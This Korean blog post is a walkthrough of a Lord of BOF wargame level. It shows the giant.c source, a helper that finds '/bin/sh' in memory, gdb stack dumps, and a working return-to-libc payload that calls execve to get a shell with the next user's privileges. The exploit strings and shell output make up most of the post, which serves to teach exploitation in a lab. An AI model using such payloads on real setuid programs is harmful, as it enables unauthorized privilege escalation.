[14] bugbear -> giant ( RTL , execve )

2017. 11. 20. 21:08SystemHacking/LOB(BOF원정대)


bugbear / new divide

[bugbear@localhost bugbear]$ /bin/bash2

[bugbear@localhost bugbear]$ export SHELL=/bin/bash2



[ giant.c ]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;
 
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
 
        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'""r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)"&lib_addr);
        fclose(fp);
 
        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'""r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x"&execve_offset);
        fclose(fp);
 
        execve_addr = lib_addr + (int)execve_offset;
        // end
 
        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }
 
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}
 
cs



[ 코드 설명 ]

* execve의 라이브러리 내의 주소를 구하는 코드

[bugbear@localhost bugbear]$ /usr/bin/ldd /home/bugbear/giant | /bin/grep libc | /bin/awk '{print $4}'

(0x40018000)

[bugbear@localhost bugbear]$ /usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'

00091d48

[bugbear@localhost bugbear]$ cp giant.c giant2.c

[bugbear@localhost bugbear]$ gcc -o giant2 giant2.c


* execve

int execve (const char *filename, char *const argv [], char *const envp[]);

=> execve ( &"/bin/sh" , 배열 { &/bin/sh,NULL} 의 주소, NULL )


[ Stack 구조 ]

....

buffer          40byte

saved ebp    &execve

saved eip     AAAA

argc            argv1 ( &"/bin/sh" )

argv[0]        argv2 ( &{ "/bin/sh" , NULL } )

argv[1]        argv3 ( NULL )



[ 메모리 상의 " /bin/sh " 문자열 찾기 ]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <stdio.h>
int main (int argc, char* argv[]) {
 
        long shell;
        shell = 0x40058ae0;
        while(memcmp((void *) shell, "/bin/sh"8)) {
                shell++;
        }
 
        printf("\"/bin/sh\" is at 0x%x\n", shell);
        printf("printf %s\n",shell);
 
        return 0;
 
}
 
 

cs

[bugbear@localhost /tmp]$ ./find

"/bin/sh" is at 0x400fbff9

printf /bin/sh


[ gdb 접근 ]

0x8048688 <main+296>:   leave

0x8048689 <main+297>:   ret

End of assembler dump.

(gdb)

(gdb) b *0x8048688

Breakpoint 1 at 0x8048688

(gdb) run "$(python -c 'print "A" * 44 + "\x48\x9d\x0a\x40" + "AAAA" + "\xf9\xbf\x0f\x40" + "\xe8\xfa\xff\xbf" + "\xec\xfa\xff\xbf"+ "BBBB" * 14 +"\xf9\xbf\x0f\x40"')"

Starting program: /home/bugbear/giant2 "$(python -c 'print "A" * 44 + "\x48\x9d\x0a\x40" + "AAAA" + "\xf9\xbf\x0f\x40" + "\xe8\xfa\xff\xbf" + "\xec\xfa\xff\xbf"+ "BBBB" * 14 +"\xf9\xbf\x0f\x40"')"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH▒

@AAAA▒@▒▒▒▒▒▒▒▒BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB▒@


Breakpoint 1, 0x8048688 in main ()

(gdb) x/24x $ebp-40

0xbffffa70:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffa80:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffa90:     0x41414141      0x41414141      0x41414141      0x400a9d48  <-- &execve

     argv1                    argv2                  argv3

0xbffffaa0:     0x41414141      0x400fbff9      0xbffffae8      0xbffffaec

0xbffffab0:     0x42424242      0x42424242      0x42424242      0x42424242

0xbffffac0:     0x42424242      0x42424242      0x42424242      0x42424242

0xbffffad0:     0x42424242      0x42424242      0x42424242      0x42424242

0xbffffae0:     0x42424242      0x42424242      0x400fbff9      0x00000000

0xbffffaf0:     0xbffffc6f      0xbffffc81      0xbffffc9a      0xbffffcb9

0xbffffb00:     0xbffffcdb      0xbffffce8      0xbffffeab      0xbffffeca

0xbffffb10:     0xbffffee7      0xbffffefc      0xbfffff1b      0xbfffff26


main함수의 ret : pop eip => execve() 가 실행된다
execve의 인자로 ebp+8 , ebp+12 , ebp+16 지점의 값들이 들어가게된다

=> execve( &"/bin/sh" , &{/bin/sh,0} , 0 )


[ payload 작성 ]


[bugbear@localhost bugbear]$ ./giant "$(python -c 'print "A" * 44 + "\x48\x9d\x0a\x40" + "AAAA" + "\xf9\xbf\x0f\x40" + "\xe8\xfa\xff\xbf" + "\xec\xfa\xff\xbf"+ "BBBB" * 14 +"\xf9\xbf\x0f\x40"')"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH▒

@AAAA▒@▒▒▒▒▒▒▒▒BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB▒@

Segmentation fault


=> 보정작업

[bugbear@localhost bugbear]$ ./giant "$(python -c 'print "A" * 44 + "\x48\x9d\x0a\x40" + "AAAA" + "\xf9\xbf\x0f\x40" + "\xf8\xfa\xff\xbf" + "\xfc\xfa\xff\xbf"+ "BBBB" * 14 +"\xf9\xbf\x0f\x40"')"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH▒

@AAAA▒@▒▒▒▒▒▒▒▒BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB▒@

bash$ id

uid=513(bugbear) gid=513(bugbear) euid=514(giant) egid=514(giant) groups=513(bugbear)

bash$ my-pass

euid = 514

one step closer

bash$ whoami

giant




저작자표시 비영리 변경금지

'SystemHacking > LOB(BOF원정대)' 카테고리의 다른 글

[16] assassin -> zombie_assassin ( Fake EBP & leaveret )  (0) 2017.11.20
[15] giant -> assassin ( Data Section ( leave & ret ) )  (0) 2017.11.20
[13] darkknight -> bugbear ( RTL ( Return To Library ) )  (0) 2017.11.17
RTL 공격기법 원리 이해하기 예제 ( Omega Project )  (0) 2017.11.17
[12] golem -> darkknight ( Frame Pointer Overflow )  (0) 2017.11.17

관련글

댓글 0

티스토리툴바